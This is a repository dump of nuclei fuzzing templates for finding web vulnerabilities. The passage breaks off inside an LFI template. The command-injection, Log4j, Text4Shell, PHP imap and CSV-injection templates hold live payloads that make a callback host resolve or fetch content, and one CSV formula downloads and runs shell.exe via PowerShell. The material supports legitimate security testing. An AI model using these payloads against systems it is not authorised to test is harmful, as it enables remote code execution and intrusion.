├── .github ├── ISSUE_TEMPLATE │ ├── config.yml │ ├── false-negative.md │ ├── false-positive.md │ ├── feature_request.md │ ├── issue-report.md │ ├── new-template.md │ └── submit-template.md └── workflows │ ├── cve-annotate.yml │ ├── syntax-checking.yml │ └── template-validate.yml ├── .gitignore ├── .yamllint ├── LICENSE ├── README.md ├── cmdi ├── blind-oast-polyglots.yaml ├── cves │ ├── CVE-2018-19518.yaml │ ├── CVE-2021-45046.yaml │ └── CVE-2022-42889.yaml └── ruby-open-rce.yaml ├── crlf ├── cookie-injection.yaml └── crlf-injection.yaml ├── csti └── angular-client-side-template-injection.yaml ├── injection ├── csv-injection.yaml └── xinclude-injection.yaml ├── lfi ├── lfi-keyed.yaml ├── linux-lfi-fuzz.yaml └── windows-lfi-fuzz.yaml ├── redirect └── open-redirect.yaml ├── rfi └── generic-rfi.yaml ├── sqli ├── cves │ └── CVE-2022-34265.yaml ├── error-based-sqli.yaml └── time-based-sqli.yaml ├── ssrf ├── blind-ssrf.yaml └── response-ssrf.yaml ├── ssti └── reflection-ssti.yaml ├── xss ├── blind-xss.yaml ├── dom-xss.yaml └── reflected-xss.yaml └── xxe └── generic-xxe.yaml /.github/ISSUE_TEMPLATE/config.yml: -------------------------------------------------------------------------------- 1 | blank_issues_enabled: false 2 | 3 | contact_links: 4 | - name: Ask an question / advise on using nuclei-templates 5 | url: https://github.com/projectdiscovery/fuzzing-templates/discussions/categories/q-a 6 | about: Ask a question or request support for using fuzzing-templates 7 | 8 | - name: Share idea / feature to discuss for nuclei-templates 9 | url: https://github.com/projectdiscovery/fuzzing-templates/discussions/categories/ideas 10 | about: Share idea / feature to discuss for fuzzing-templates 11 | 12 | - name: Connect with PD Team & Community (Discord) 13 | url: https://discord.gg/projectdiscovery 14 | about: Connect with PD Team & Community for direct communication -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/false-negative.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: False Negative 3 | about: 'Issue for template missing valid/expected result.' 4 | labels: 'false-negative' 5 | 6 | --- 7 | 8 | 9 | 10 | ### Nuclei Version: 11 | 12 | 13 | 14 | ### Template file: 15 | 16 | 17 | 18 | ### Command to reproduce: 19 | 20 | 21 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/false-positive.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: False Positive 3 | about: 'Issue for template producing invalid/unexpected result.' 4 | labels: 'false-positive' 5 | 6 | --- 7 | 8 | 9 | 10 | ### Nuclei Version: 11 | 12 | 13 | 14 | ### Template file: 15 | 16 | 17 | 18 | ### Command to reproduce: 19 | 20 | 21 | 22 | 23 | ### Anything else: 24 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Request feature to implement in this project 4 | labels: 'Type: Enhancement' 5 | --- 6 | 7 | 13 | 14 | ### Please describe your feature request: 15 | 16 | 17 | ### Describe the use case of this feature: 18 | 19 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/issue-report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Issue report 3 | about: "Issue to report invalid template" 4 | labels: 'Type: Bug' 5 | 6 | --- 7 | 8 | 13 | 14 | 15 | 16 | ### Issue description: 17 | 18 | 19 | 20 | ### Anything else: 21 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/new-template.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Template Request 3 | about: 'request for new template to be created.' 4 | labels: 'new-template' 5 | 6 | --- 7 | 8 | 9 | 10 | 11 | ### Template for? 12 | 13 | 14 | 15 | ### Details: 16 | 17 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/submit-template.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Template Contribution 3 | about: Contributing nuclei template using GitHub Issue 4 | labels: 'nuclei-template' 5 | --- 6 | 7 | ### Template Information: 8 | 9 | 10 | 11 | 12 | 13 | ### Nuclei Template: 14 | 15 | 16 | 17 | 18 | ```yaml 19 | 20 | ``` 21 | 22 | 23 | -------------------------------------------------------------------------------- /.github/workflows/cve-annotate.yml: -------------------------------------------------------------------------------- 1 | name: ✍🏻 CVE Annotate 2 | 3 | on: 4 | pull_request: 5 | paths: 6 | - '**/cves/' 7 | workflow_dispatch: 8 | 9 | jobs: 10 | annotate: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - name: Check out code 14 | uses: actions/checkout@v3 15 | with: 16 | ref: ${{ github.head_ref }} 17 | fetch-depth: 0 18 | token: ${{ secrets.GITHUB_TOKEN }} 19 | 20 | - name: Get Github tag 21 | id: meta 22 | run: | 23 | curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT 24 | 25 | - name: Setup CVE annotate 26 | if: steps.meta.outputs.TAG != '' 27 | env: 28 | VERSION: ${{ steps.meta.outputs.TAG }} 29 | run: | 30 | wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip 31 | sudo unzip cve-annotate.zip -d /usr/local/bin 32 | working-directory: /tmp 33 | 34 | - name: Generate CVE Annotations 35 | id: cve-annotate 36 | run: | 37 | cve-annotate -i . -d . 38 | git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT 39 | 40 | - name: Commit files 41 | if: steps.cve-annotate.outputs.CHANGES > 0 42 | run: | 43 | git config --local user.email "action@github.com" 44 | git config --local user.name "GitHub Action" 45 | git add . 46 | git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a 47 | 48 | - name: Push changes 49 | if: steps.cve-annotate.outputs.CHANGES > 0 50 | uses: ad-m/github-push-action@master 51 | with: 52 | github_token: ${{ secrets.GITHUB_TOKEN }} 53 | branch: ${{ github.ref }} -------------------------------------------------------------------------------- /.github/workflows/syntax-checking.yml: -------------------------------------------------------------------------------- 1 | name: ❄️ YAML Lint 2 | 3 | on: 4 | pull_request: 5 | workflow_dispatch: 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - uses: actions/checkout@v2 12 | - name: Yamllint 13 | uses: karancode/yamllint-github-action@master 14 | with: 15 | yamllint_config_filepath: .yamllint 16 | yamllint_strict: false 17 | yamllint_comment: true 18 | -------------------------------------------------------------------------------- /.github/workflows/template-validate.yml: -------------------------------------------------------------------------------- 1 | name: 🛠 Template Validate 2 | 3 | on: 4 | pull_request: 5 | workflow_dispatch: 6 | 7 | jobs: 8 | validate: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - uses: actions/checkout@v2 12 | 13 | - name: Get Github tag 14 | id: meta 15 | run: | 16 | curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT 17 | 18 | - name: Setup Nuclei 19 | if: steps.meta.outputs.TAG != '' 20 | env: 21 | VERSION: ${{ steps.meta.outputs.TAG }} 22 | run: | 23 | wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip 24 | sudo unzip nuclei*.zip -d /usr/local/bin 25 | working-directory: /tmp 26 | 27 | - name: Template Validation 28 | run: | 29 | cp -r ${{ github.workspace }} $HOME 30 | nuclei -validate -lfa 31 | nuclei -validate -lfa -w ./workflows -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | notes.txt 2 | .DS_Store 3 | -------------------------------------------------------------------------------- /.yamllint: -------------------------------------------------------------------------------- 1 | extends: default 2 | 3 | ignore: | 4 | .pre-commit-config.yml 5 | .github/workflows/*.yml 6 | 7 | rules: 8 | document-start: disable 9 | line-length: disable 10 | new-lines: disable 11 | new-line-at-end-of-file: disable 12 | truthy: disable 13 | comments: 14 | require-starting-space: true 15 | ignore-shebangs: true 16 | min-spaces-from-content: 1 17 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 ProjectDiscovery 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 |

4 | Fuzzing Templates 5 |

6 |

Community curated list of fuzzing templates for the nuclei engine to find unknown security vulnerabilities.

7 | 8 | 9 |

10 | 11 | 12 | 13 |

14 | 15 |

16 | Documentation • 17 | Contributions • 18 | Discussion • 19 | Community 20 |

21 | 22 | ---- 23 | 24 | Fuzzing templates are used with [nuclei](https://github.com/projectdiscovery/nuclei) scanner which powers the actual scanning engine. This repository contains various fuzzing templates for the scanner provided by our team, as well as contributed by the community. 25 | 26 | We welcome contributions from the community through pull requests or issues to increase the coverage of security testing. Unlike the [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) project, which focuses on known vulnerabilities, fuzzing templates are specifically designed to **discover previously unknown vulnerabilities** in applications. 27 | 28 | 29 | ![image](https://user-images.githubusercontent.com/8293321/205839007-b18a1dc2-5b4e-4ee4-9051-c13b30089ee3.png) 30 | 31 | 32 | 33 | 📖 Documentation 34 | ----- 35 | 36 | Please navigate to https://docs.nuclei.sh/template-guide/http/http-fuzzing for detailed documentation to **build your own fuzzing** template. 37 | We have also added a set of templates to help you understand how things work. 38 | 39 | 40 | 🌪️ Using Fuzzing Templates 41 | ----- 42 | 43 | 1. **Install Nuclei** 44 | 45 | ``` 46 | go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest 47 | ``` 48 | 49 | 2. **Clone Fuzzing Templates** 50 | 51 | ``` 52 | git clone https://github.com/projectdiscovery/fuzzing-templates.git 53 | ``` 54 | 55 | 3. **Run Fuzzing Templates** 56 | 57 | #### Input for fuzzing templates: 58 | 59 | Current fuzzing support is limited to URLs with with query parameters, so any urls with no query parameters will be simply ignored. 60 | 61 | ```bash 62 | $ cat fuzz_endpoints.txt 63 | 64 | http://127.0.0.1:8082/info?name=test&another=value&random=data 65 | http://127.0.0.1:8082/redirect?redirect_url=/info?name=redirected_from_url 66 | http://127.0.0.1:8082/request?url=https://example.com 67 | http://127.0.0.1:8082/email?text=important_user 68 | http://127.0.0.1:8082/permissions?cmd=whoami 69 | http://127.0.0.1:8082/info?name=redirected_from_url 70 | ``` 71 | 72 | > **Note**: 73 | 74 | > *You can use [katana](https://github.com/projectdiscovery/katana) with query url filter (`-f qurl`) to get list of endpoints to run with url fuzzing templates* 75 | 76 | #### Running fuzzing templates: 77 | 78 | ``` 79 | nuclei -t fuzzing-templates -list fuzz_endpoints.txt 80 | ``` 81 | 82 | > **Note**: 83 | 84 | > *You can use existing nuclei options to filter / run specific directory / sub directory / templates or tags* 85 | 86 | 💬 Discussion 87 | ----- 88 | 89 | Got questions / doubts / ideas to discuss? 90 | Feel free to open a discussion on [GitHub discussions](https://github.com/projectdiscovery/fuzzing-templates/discussions) board. 91 | 92 | 93 | 👨‍💻 Community 94 | ----- 95 | 96 | You are welcome to join the active [Discord Community](https://discord.gg/projectdiscovery) to discuss directly with project maintainers and share things with others around security and automation. 97 | Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be updated on all the things about Nuclei. 98 | 99 | 100 |

101 | 102 | 103 | 104 |

105 | 106 | 107 | Thanks again for your contribution and keeping this community vibrant. ❤️ 108 | -------------------------------------------------------------------------------- /cmdi/blind-oast-polyglots.yaml: -------------------------------------------------------------------------------- 1 | id: cmdi-blind-oast-polyglot 2 | 3 | info: 4 | name: Blind OS Command Injection 5 | author: pdteam,geeknik 6 | severity: high 7 | description: | 8 | Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. 9 | Successful exploitation could lead to arbitrary command execution on the system. 10 | reference: 11 | - https://portswigger.net/research/hunting-asynchronous-vulnerabilities 12 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md 13 | metadata: 14 | max-request: 4 15 | tags: cmdi,oast,dast,blind,polyglot 16 | 17 | variables: 18 | marker: "{{interactsh-url}}" 19 | 20 | http: 21 | - pre-condition: 22 | - type: dsl 23 | dsl: 24 | - 'method == "GET"' 25 | 26 | payloads: 27 | payload: 28 | - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'" 29 | - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}" 30 | - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/" 31 | - "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)" 32 | 33 | fuzzing: 34 | - part: query 35 | type: postfix 36 | fuzz: 37 | - "{{payload}}" 38 | 39 | stop-at-first-match: true 40 | matchers: 41 | - type: word 42 | part: interactsh_protocol 43 | words: 44 | - "dns" 45 | 46 | - type: word 47 | part: interactsh_protocol 48 | words: 49 | - "http" 50 | -------------------------------------------------------------------------------- /cmdi/cves/CVE-2018-19518.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-19518 2 | 3 | info: 4 | name: PHP imap - Remote Command Execution 5 | author: princechaddha 6 | severity: high 7 | description: | 8 | University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. 9 | reference: 10 | - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518 11 | - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 12 | - https://www.openwall.com/lists/oss-security/2018/11/22/3 13 | - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 16 | cvss-score: 7.5 17 | cve-id: CVE-2018-19518 18 | cwe-id: CWE-88 19 | metadata: 20 | confidence: tenative 21 | tags: imap,dast,vulhub,cve,cve2018,rce,oast,php 22 | 23 | http: 24 | - method: GET 25 | path: 26 | - "{{BaseURL}}" 27 | 28 | payloads: 29 | php-imap: 30 | - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}" 31 | 32 | fuzzing: 33 | - part: query 34 | fuzz: 35 | - "{{php-imap}}" 36 | 37 | matchers: 38 | - type: word 39 | part: interactsh_protocol # Confirms the DNS Interaction 40 | words: 41 | - "dns" 42 | -------------------------------------------------------------------------------- /cmdi/cves/CVE-2021-45046.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-45046 2 | 3 | info: 4 | name: Apache Log4j2 - Remote Code Injection 5 | author: princechaddha 6 | severity: critical 7 | description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. 8 | reference: 9 | - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/ 10 | - https://twitter.com/marcioalm/status/1471740771581652995 11 | - https://logging.apache.org/log4j/2.x/ 12 | - http://www.openwall.com/lists/oss-security/2021/12/14/4 13 | - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H 16 | cvss-score: 9 17 | cve-id: CVE-2021-45046 18 | cwe-id: CWE-502 19 | metadata: 20 | confidence: tenative 21 | tags: cve,cve2021,rce,oast,log4j,injection,dast 22 | 23 | http: 24 | - method: GET 25 | path: 26 | - "{{BaseURL}}" 27 | 28 | payloads: 29 | log4j: 30 | - "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}" 31 | 32 | fuzzing: 33 | - part: query 34 | fuzz: 35 | - "{{log4j}}" 36 | 37 | matchers-condition: and 38 | matchers: 39 | - type: word 40 | part: interactsh_protocol # Confirms the DNS Interaction 41 | words: 42 | - "dns" 43 | 44 | - type: regex 45 | part: interactsh_request 46 | regex: 47 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output 48 | 49 | extractors: 50 | - type: regex 51 | part: interactsh_request 52 | group: 2 53 | regex: 54 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output 55 | 56 | - type: regex 57 | part: interactsh_request 58 | group: 1 59 | regex: 60 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output 61 | -------------------------------------------------------------------------------- /cmdi/cves/CVE-2022-42889.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2022-42889 2 | 3 | info: 4 | name: Text4Shell - Remote Code Execution 5 | author: mordavid,princechaddha 6 | severity: critical 7 | description: | 8 | Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. 9 | reference: 10 | - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om 11 | - http://www.openwall.com/lists/oss-security/2022/10/13/4 12 | - http://www.openwall.com/lists/oss-security/2022/10/18/1 13 | - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/ 14 | - https://github.com/silentsignal/burp-text4shell 15 | remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. 16 | classification: 17 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 18 | cvss-score: 9.8 19 | cve-id: CVE-2022-42889 20 | cwe-id: CWE-94 21 | metadata: 22 | confidence: tenative 23 | tags: cve,cve2022,rce,oast,text4shell,dast 24 | 25 | http: 26 | - method: GET 27 | path: 28 | - "{{BaseURL}}" 29 | 30 | payloads: 31 | text4shell: 32 | - "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}" 33 | 34 | fuzzing: 35 | - part: query 36 | fuzz: 37 | - "{{text4shell}}" 38 | 39 | matchers-condition: and 40 | matchers: 41 | - type: word 42 | part: interactsh_protocol # Confirms the DNS Interaction 43 | words: 44 | - "dns" 45 | 46 | - type: regex 47 | part: interactsh_request 48 | regex: 49 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output 50 | 51 | extractors: 52 | - type: kval 53 | kval: 54 | - interactsh_ip # Print remote interaction IP in output 55 | 56 | - type: regex 57 | part: interactsh_request 58 | group: 2 59 | regex: 60 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output 61 | 62 | - type: regex 63 | part: interactsh_request 64 | group: 1 65 | regex: 66 | -------------------------------------------------------------------------------- /cmdi/ruby-open-rce.yaml: -------------------------------------------------------------------------------- 1 | id: cmdi-ruby-open-rce 2 | 3 | info: 4 | name: Ruby Kernel#open/URI.open RCE 5 | author: pdteam 6 | severity: high 7 | description: | 8 | Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. 9 | reference: 10 | - https://bishopfox.com/blog/ruby-vulnerabilities-exploits 11 | - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ 12 | metadata: 13 | max-request: 1 14 | tags: cmdi,oast,dast,blind,ruby,rce 15 | 16 | variables: 17 | marker: "{{interactsh-url}}" 18 | 19 | http: 20 | - pre-condition: 21 | - type: dsl 22 | dsl: 23 | - 'method == "GET"' 24 | 25 | stop-at-first-match: true 26 | payloads: 27 | interaction: 28 | - "|nslookup {{marker}}|curl {{marker}}" 29 | 30 | fuzzing: 31 | - part: query 32 | fuzz: 33 | - "{{interaction}}" 34 | 35 | matchers: 36 | - type: word 37 | part: interactsh_protocol 38 | words: 39 | - "dns" 40 | -------------------------------------------------------------------------------- /crlf/cookie-injection.yaml: -------------------------------------------------------------------------------- 1 | id: cookie-injection 2 | 3 | info: 4 | name: Parameter based cookie injection 5 | author: pdteam 6 | severity: info 7 | reference: 8 | - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/ 9 | - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm 10 | metadata: 11 | max-request: 1 12 | tags: reflected,dast,cookie,injection 13 | 14 | variables: 15 | first: "cookie_injection" 16 | 17 | http: 18 | - pre-condition: 19 | - type: dsl 20 | dsl: 21 | - 'method == "GET"' 22 | 23 | payloads: 24 | reflection: 25 | - "{{first}}" 26 | 27 | fuzzing: 28 | - part: query 29 | type: postfix 30 | fuzz: 31 | - "{{reflection}}" 32 | 33 | matchers: 34 | - type: regex 35 | part: header 36 | regex: 37 | - '(?m)(?i)(^set-cookie.*cookie_injection.*)' 38 | -------------------------------------------------------------------------------- /crlf/crlf-injection.yaml: -------------------------------------------------------------------------------- 1 | id: crlf-injection 2 | 3 | info: 4 | name: CRLF Injection 5 | author: pdteam 6 | severity: low 7 | metadata: 8 | max-request: 41 9 | tags: crlf,dast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | escape: 19 | - "%00" 20 | - "%0a" 21 | - "%0a%20" 22 | - "%0d" 23 | - "%0d%09" 24 | - "%0d%0a" 25 | - "%0d%0a%09" 26 | - "%0d%0a%20" 27 | - "%0d%20" 28 | - "%20" 29 | - "%20%0a" 30 | - "%20%0d" 31 | - "%20%0d%0a" 32 | - "%23%0a" 33 | - "%23%0a%20" 34 | - "%23%0d" 35 | - "%23%0d%0a" 36 | - "%23%oa" 37 | - "%25%30" 38 | - "%25%30%61" 39 | - "%2e%2e%2f%0d%0a" 40 | - "%2f%2e%2e%0d%0a" 41 | - "%2f..%0d%0a" 42 | - "%3f" 43 | - "%3f%0a" 44 | - "%3f%0d" 45 | - "%3f%0d%0a" 46 | - "%e5%98%8a%e5%98%8d" 47 | - "%e5%98%8a%e5%98%8d%0a" 48 | - "%e5%98%8a%e5%98%8d%0d" 49 | - "%e5%98%8a%e5%98%8d%0d%0a" 50 | - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d" 51 | - "%u0000" 52 | - "%u000a" 53 | - "%u000d" 54 | - "\r" 55 | - "\r%20" 56 | - "\r\n" 57 | - "\r\n%20" 58 | - "\r\n\t" 59 | - "\r\t" 60 | 61 | fuzzing: 62 | - part: query 63 | type: postfix 64 | fuzz: 65 | - "{{escape}}Set-Cookie:crlfinjection=crlfinjection" 66 | 67 | stop-at-first-match: true 68 | matchers: 69 | - type: regex 70 | part: header 71 | regex: 72 | - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' 73 | -------------------------------------------------------------------------------- /csti/angular-client-side-template-injection.yaml: -------------------------------------------------------------------------------- 1 | id: angular-client-side-template-injection 2 | 3 | info: 4 | name: Angular Client-side-template-injection 5 | author: theamanrawat 6 | severity: high 7 | description: | 8 | Detects Angular client-side template injection vulnerability. 9 | impact: | 10 | May lead to remote code execution or sensitive data exposure. 11 | remediation: | 12 | Sanitize user inputs and avoid using user-controlled data in template rendering. 13 | reference: 14 | - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ 15 | - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs 16 | tags: angular,csti,dast,headless,xss 17 | 18 | variables: 19 | first: "{{rand_int(1000, 9999)}}" 20 | second: "{{rand_int(1000, 9999)}}" 21 | result: "{{to_number(first)*to_number(second)}}" 22 | 23 | headless: 24 | - steps: 25 | - action: navigate 26 | args: 27 | url: "{{BaseURL}}" 28 | 29 | - action: waitload 30 | 31 | payloads: 32 | payload: 33 | - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' 34 | 35 | fuzzing: 36 | - part: query 37 | type: postfix 38 | mode: single 39 | fuzz: 40 | - "{{payload}}" 41 | 42 | matchers: 43 | - type: word 44 | part: body 45 | words: 46 | - "{{result}}" 47 | -------------------------------------------------------------------------------- /injection/csv-injection.yaml: -------------------------------------------------------------------------------- 1 | id: csv-injection 2 | 3 | info: 4 | name: CSV Injection Detection 5 | author: DhiyaneshDK,ritikchaddha 6 | severity: medium 7 | description: | 8 | A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications. 9 | tags: dast,csv,oast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | csv_fuzz: 19 | - "class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}" 20 | - 'DDE ("cmd";"/C nslookup{{interactsh-url}}";"!A0")A0' 21 | - "@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0" 22 | - "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0" 23 | - "=cmd|' /C nslookup{{interactsh-url}}'!'A1'" 24 | - "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0" 25 | - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")' 26 | - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))' 27 | - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)' 28 | - '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")' 29 | 30 | fuzzing: 31 | - part: query 32 | type: replace # replaces existing parameter value with fuzz payload 33 | mode: multiple # replaces all parameters value with fuzz payload 34 | fuzz: 35 | - '{{csv_fuzz}}' 36 | 37 | matchers-condition: and 38 | matchers: 39 | - type: word 40 | part: interactsh_protocol # Confirms the HTTP Interaction 41 | words: 42 | - "http" 43 | 44 | - type: word 45 | part: header 46 | words: 47 | - "text/csv" 48 | - "application/csv" 49 | - "application/vnd.ms-excel" 50 | -------------------------------------------------------------------------------- /injection/xinclude-injection.yaml: -------------------------------------------------------------------------------- 1 | id: xinclude-injection 2 | 3 | info: 4 | name: XInclude Injection - Detection 5 | author: DhiyaneshDK,ritikchaddha 6 | severity: high 7 | description: | 8 | XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. 9 | reference: 10 | - https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks 11 | tags: dast,xxe,xinclude 12 | 13 | http: 14 | - pre-condition: 15 | - type: dsl 16 | dsl: 17 | - 'method == "GET"' 18 | 19 | payloads: 20 | xinc_fuzz: 21 | - '' 22 | - '' 23 | 24 | fuzzing: 25 | - part: query 26 | type: replace # replaces existing parameter value with fuzz payload 27 | mode: multiple # replaces all parameters value with fuzz payload 28 | fuzz: 29 | - '{{xinc_fuzz}}' 30 | 31 | stop-at-first-match: true 32 | matchers-condition: or 33 | matchers: 34 | - type: regex 35 | name: linux 36 | part: body 37 | regex: 38 | - 'root:.*?:[0-9]*:[0-9]*:' 39 | 40 | - type: word 41 | name: windows 42 | part: body 43 | words: 44 | - 'for 16-bit app support' 45 | -------------------------------------------------------------------------------- /lfi/lfi-keyed.yaml: -------------------------------------------------------------------------------- 1 | id: lfi-keyed 2 | 3 | info: 4 | name: LFI Detection - Keyed 5 | author: pwnhxl 6 | severity: unknown 7 | reference: 8 | - https://owasp.org/www-community/attacks/Unicode_Encoding 9 | metadata: 10 | max-request: 25 11 | tags: dast,pathtraversal,lfi 12 | 13 | variables: 14 | fuzz: "../../../../../../../../../../../../../../../" 15 | fuzz_urlx2_encode: 